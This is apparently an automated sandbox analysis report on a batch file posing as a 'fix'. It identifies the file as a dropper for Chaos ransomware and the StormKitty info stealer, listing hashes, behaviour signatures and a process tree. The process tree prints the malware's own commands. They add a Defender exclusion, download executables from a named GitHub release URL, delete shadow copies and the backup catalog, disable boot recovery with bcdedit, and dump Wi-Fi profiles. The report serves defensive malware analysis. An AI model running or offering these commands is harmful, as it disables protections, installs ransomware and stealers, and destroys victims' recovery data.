Analysis
-
max time kernel
109s -
max time network
117s -
platform
windows11-21h2_x64 -
resource
win11-20250313-en -
resource tags
arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system -
submitted
24/03/2025, 04:06
Static task
static1
Behavioral task
behavioral1
Sample
fix (4).bat
Resource
win11-20250313-en
General
-
Target
fix (4).bat
-
Size
2KB
-
MD5
160b408ccc1bd513057cba516f4436e7
-
SHA1
0deecfee13ebc656eecc6aaab2a8978bc93268d0
-
SHA256
50c4082ed4c65e96649e53ba20fec89ead550d4774901dcccaf562db79a9e3e4
-
SHA512
74777e896abd4ca6f4282a1dff09c133f95ecd17f1bb48140fce2f2cca615e5be034950cdf8d3ad3846338f442c8e326fac69ef1b18104bd344e7cd33bdec933
Malware Config
Signatures
-
Chaos
Ransomware family first seen in June 2021.
-
Chaos Ransomware 2 IoCs
resource yara_rule behavioral1/files/0x001900000002b08e-44.dat family_chaos behavioral1/memory/2944-48-0x00000000007B0000-0x00000000007D8000-memory.dmp family_chaos -
Chaos family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral1/files/0x001d00000002b08f-47.dat family_stormkitty behavioral1/memory/4880-59-0x0000000000F80000-0x0000000000FC4000-memory.dmp family_stormkitty -
Stormkitty family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3460 bcdedit.exe 5080 bcdedit.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 2 5088 powershell.exe 4 5088 powershell.exe 5 2844 powershell.exe 6 2844 powershell.exe -
pid Process 1032 wbadmin.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file 2 IoCs
flow pid Process 4 5088 powershell.exe 6 2844 powershell.exe -
Uses browser remote debugging 2 TTPs 5 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1928 chrome.exe 5036 chrome.exe 2604 chrome.exe 928 chrome.exe 2448 chrome.exe -
Drops startup file 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\readme.txt svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url svchost.exe -
Executes dropped EXE 3 IoCs
pid Process 2944 build.exe 4880 kernelv.exe 2036 svchost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
pid Process 3396 powershell.exe 5088 powershell.exe 2844 powershell.exe -
Drops desktop.ini file(s) 64 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Videos\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini svchost.exe File opened for modification C:\Users\Public\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini svchost.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini svchost.exe File opened for modification C:\Users\Public\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini svchost.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini svchost.exe File opened for modification C:\Users\Public\Libraries\desktop.ini svchost.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1136229799-3442283115-138161576-1000\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Music\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini svchost.exe File opened for modification C:\Users\Public\Downloads\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Searches\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini svchost.exe File opened for modification C:\Users\Public\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Public\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Public\Music\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ipinfo.io 7 ipinfo.io -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\xboyrybqu.jpg" svchost.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 3396 powershell.exe 1660 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kernelv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4576 cmd.exe 3252 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 kernelv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier kernelv.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1920 vssadmin.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\MuiCache BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" BackgroundTransferHost.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2736 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2036 svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3396 powershell.exe 3396 powershell.exe 5088 powershell.exe 5088 powershell.exe 2844 powershell.exe 2844 powershell.exe 2944 build.exe 2944 build.exe 2944 build.exe 1660 powershell.exe 1660 powershell.exe 2944 build.exe 2944 build.exe 2944 build.exe 2944 build.exe 2944 build.exe 2944 build.exe 2944 build.exe 2944 build.exe 2944 build.exe 2944 build.exe 2944 build.exe 2944 build.exe 2944 build.exe 2944 build.exe 2944 build.exe 2944 build.exe 2944 build.exe 2944 build.exe 4880 kernelv.exe 4880 kernelv.exe 4880 kernelv.exe 4880 kernelv.exe 4880 kernelv.exe 4880 kernelv.exe 4880 kernelv.exe 4880 kernelv.exe 4880 kernelv.exe 4880 kernelv.exe 4880 kernelv.exe 4880 kernelv.exe 4880 kernelv.exe 4880 kernelv.exe 4880 kernelv.exe 4880 kernelv.exe 4880 kernelv.exe 4880 kernelv.exe 2944 build.exe 2944 build.exe 2944 build.exe 2944 build.exe 2036 svchost.exe 2036 svchost.exe 2036 svchost.exe 4880 kernelv.exe 4880 kernelv.exe 4880 kernelv.exe 2036 svchost.exe 2036 svchost.exe 2036 svchost.exe 2036 svchost.exe 2036 svchost.exe 2036 svchost.exe 2036 svchost.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 1928 chrome.exe 1928 chrome.exe 1928 chrome.exe 1928 chrome.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeDebugPrivilege 3396 powershell.exe Token: SeDebugPrivilege 5088 powershell.exe Token: SeDebugPrivilege 2844 powershell.exe Token: SeDebugPrivilege 2944 build.exe Token: SeDebugPrivilege 1660 powershell.exe Token: SeDebugPrivilege 4880 kernelv.exe Token: SeDebugPrivilege 2036 svchost.exe Token: SeShutdownPrivilege 1928 chrome.exe Token: SeCreatePagefilePrivilege 1928 chrome.exe Token: SeShutdownPrivilege 1928 chrome.exe Token: SeCreatePagefilePrivilege 1928 chrome.exe Token: SeBackupPrivilege 2168 vssvc.exe Token: SeRestorePrivilege 2168 vssvc.exe Token: SeAuditPrivilege 2168 vssvc.exe Token: SeIncreaseQuotaPrivilege 3980 WMIC.exe Token: SeSecurityPrivilege 3980 WMIC.exe Token: SeTakeOwnershipPrivilege 3980 WMIC.exe Token: SeLoadDriverPrivilege 3980 WMIC.exe Token: SeSystemProfilePrivilege 3980 WMIC.exe Token: SeSystemtimePrivilege 3980 WMIC.exe Token: SeProfSingleProcessPrivilege 3980 WMIC.exe Token: SeIncBasePriorityPrivilege 3980 WMIC.exe Token: SeCreatePagefilePrivilege 3980 WMIC.exe Token: SeBackupPrivilege 3980 WMIC.exe Token: SeRestorePrivilege 3980 WMIC.exe Token: SeShutdownPrivilege 3980 WMIC.exe Token: SeDebugPrivilege 3980 WMIC.exe Token: SeSystemEnvironmentPrivilege 3980 WMIC.exe Token: SeRemoteShutdownPrivilege 3980 WMIC.exe Token: SeUndockPrivilege 3980 WMIC.exe Token: SeManageVolumePrivilege 3980 WMIC.exe Token: 33 3980 WMIC.exe Token: 34 3980 WMIC.exe Token: 35 3980 WMIC.exe Token: 36 3980 WMIC.exe Token: SeIncreaseQuotaPrivilege 3980 WMIC.exe Token: SeSecurityPrivilege 3980 WMIC.exe Token: SeTakeOwnershipPrivilege 3980 WMIC.exe Token: SeLoadDriverPrivilege 3980 WMIC.exe Token: SeSystemProfilePrivilege 3980 WMIC.exe Token: SeSystemtimePrivilege 3980 WMIC.exe Token: SeProfSingleProcessPrivilege 3980 WMIC.exe Token: SeIncBasePriorityPrivilege 3980 WMIC.exe Token: SeCreatePagefilePrivilege 3980 WMIC.exe Token: SeBackupPrivilege 3980 WMIC.exe Token: SeRestorePrivilege 3980 WMIC.exe Token: SeShutdownPrivilege 3980 WMIC.exe Token: SeDebugPrivilege 3980 WMIC.exe Token: SeSystemEnvironmentPrivilege 3980 WMIC.exe Token: SeRemoteShutdownPrivilege 3980 WMIC.exe Token: SeUndockPrivilege 3980 WMIC.exe Token: SeManageVolumePrivilege 3980 WMIC.exe Token: 33 3980 WMIC.exe Token: 34 3980 WMIC.exe Token: 35 3980 WMIC.exe Token: 36 3980 WMIC.exe Token: SeShutdownPrivilege 1928 chrome.exe Token: SeCreatePagefilePrivilege 1928 chrome.exe Token: SeBackupPrivilege 4296 wbengine.exe Token: SeRestorePrivilege 4296 wbengine.exe Token: SeSecurityPrivilege 4296 wbengine.exe Token: SeShutdownPrivilege 1928 chrome.exe Token: SeCreatePagefilePrivilege 1928 chrome.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1928 chrome.exe 1928 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4876 wrote to memory of 668 4876 cmd.exe 82 PID 4876 wrote to memory of 668 4876 cmd.exe 82 PID 668 wrote to memory of 232 668 net.exe 83 PID 668 wrote to memory of 232 668 net.exe 83 PID 4876 wrote to memory of 3396 4876 cmd.exe 84 PID 4876 wrote to memory of 3396 4876 cmd.exe 84 PID 4876 wrote to memory of 5088 4876 cmd.exe 86 PID 4876 wrote to memory of 5088 4876 cmd.exe 86 PID 4876 wrote to memory of 2844 4876 cmd.exe 87 PID 4876 wrote to memory of 2844 4876 cmd.exe 87 PID 4876 wrote to memory of 2944 4876 cmd.exe 88 PID 4876 wrote to memory of 2944 4876 cmd.exe 88 PID 4876 wrote to memory of 4880 4876 cmd.exe 89 PID 4876 wrote to memory of 4880 4876 cmd.exe 89 PID 4876 wrote to memory of 4880 4876 cmd.exe 89 PID 4876 wrote to memory of 1660 4876 cmd.exe 90 PID 4876 wrote to memory of 1660 4876 cmd.exe 90 PID 4880 wrote to memory of 4576 4880 kernelv.exe 91 PID 4880 wrote to memory of 4576 4880 kernelv.exe 91 PID 4880 wrote to memory of 4576 4880 kernelv.exe 91 PID 4576 wrote to memory of 2476 4576 cmd.exe 93 PID 4576 wrote to memory of 2476 4576 cmd.exe 93 PID 4576 wrote to memory of 2476 4576 cmd.exe 93 PID 4576 wrote to memory of 3252 4576 cmd.exe 95 PID 4576 wrote to memory of 3252 4576 cmd.exe 95 PID 4576 wrote to memory of 3252 4576 cmd.exe 95 PID 4576 wrote to memory of 3428 4576 cmd.exe 96 PID 4576 wrote to memory of 3428 4576 cmd.exe 96 PID 4576 wrote to memory of 3428 4576 cmd.exe 96 PID 4880 wrote to memory of 1008 4880 kernelv.exe 97 PID 4880 wrote to memory of 1008 4880 kernelv.exe 97 PID 4880 wrote to memory of 1008 4880 kernelv.exe 97 PID 2944 wrote to memory of 2036 2944 build.exe 101 PID 2944 wrote to memory of 2036 2944 build.exe 101 PID 4880 wrote to memory of 1928 4880 kernelv.exe 102 PID 4880 wrote to memory of 1928 4880 kernelv.exe 102 PID 1928 wrote to memory of 1772 1928 chrome.exe 103 PID 1928 wrote to memory of 1772 1928 chrome.exe 103 PID 1928 wrote to memory of 4752 1928 chrome.exe 104 PID 1928 wrote to memory of 4752 1928 chrome.exe 104 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 PID 1928 wrote to memory of 2860 1928 chrome.exe 106 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fix (4).bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:232
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"2⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"2⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"2⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2036 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete4⤵PID:3924
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:1920
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no4⤵PID:2692
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:3460
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
PID:5080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet4⤵PID:3876
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet5⤵
- Deletes backup catalog
PID:1032
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt4⤵
- Opens file in notepad (likely ransom note)
PID:2736
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kernelv.exe"C:\Users\Admin\AppData\Local\Temp\kernelv.exe"2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:4880 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
- System Location Discovery: System Language Discovery
PID:2476
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3252
-
-
C:\Windows\SysWOW64\findstr.exefindstr All4⤵
- System Location Discovery: System Language Discovery
PID:3428
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid3⤵
- System Location Discovery: System Language Discovery
PID:1008 -
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
- System Location Discovery: System Language Discovery
PID:4784
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid4⤵
